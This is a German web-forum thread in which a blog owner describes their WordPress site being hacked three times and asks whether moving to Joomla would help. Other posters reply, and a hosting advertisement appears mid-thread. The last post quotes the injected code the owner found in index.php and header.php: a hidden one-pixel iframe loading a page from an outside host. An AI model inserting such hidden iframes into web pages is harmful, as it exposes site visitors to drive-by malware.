Site zum dritten mal gehackt..

• hallo zusammen,

weiß nicht mehr was ich machen soll.In 3 Wochen wurde mein Block 3x gehackt.Provider informiert,Passwörter auf Server,FTP und überall gewechselt,neue Plugins deinstalliert,unverseuchten,älteren Backup eingespielt.Bei letztem Hack habe zusätzlich einen Scanner und Schutz Plugin installiert.Trotzdem ist es seit heute wieder gehackt.Ich weiß wirklich nicht,was ich noch tun kann.Habe überlegt die Wordpress Seiten in Joomla migrieren.Wäre es vielleicht eine Lösung?

mg.I.

• Anzeige

Hallo!

Wenn du gerade an deiner Website arbeitest oder dein aktuelles Hosting überdenkst: Wir betreiben mit NetzLiving eine Hosting-Plattform, die speziell auf Performance, Sicherheit und einfache Verwaltung ausgelegt ist.

• ✔️ Schnelle Ladezeiten (optimiert für WordPress & Co.)
    • ✔️ Deutsche Server & DSGVO-konform
    • ✔️ Persönlicher Support (kein 0815-Ticket-System)

Mehr erfahren

• Der Provider hat mir es geschrieben und auch von Google sind Meldungen gekommen.Google hat dan den Block auch mit Warnung auf Malware blockiert .lg.

• Meine Seite mit Joomla wurde bereits 2x gehackt und mit Naziparolen "beschmiert", angebliche Täter aus der Türkei lt. damaligem Provider. Also auch nicht DIE Lösung.

• habe es jetzt gefunden . Es ist in index.php und header.php

}
    <!-- . --><iframe width="1px" height="1px" src=" http://die Seite:7891/preferences/button.php?licenses=157" style="display:block;" ></iframe>
    <!-- . -->

...Wahrscheinlich ein Bild,ein ,, Punkt,, der Große nach,es verweißt auf eine Webseite...aber wie ich herausraus finde wie es auf die Seite gekommen.:sad: ...

Jetzt mitmachen!

Sie haben noch kein Benutzerkonto auf unserer Seite? Registrieren Sie sich kostenlos und nehmen Sie an unserer Community teil!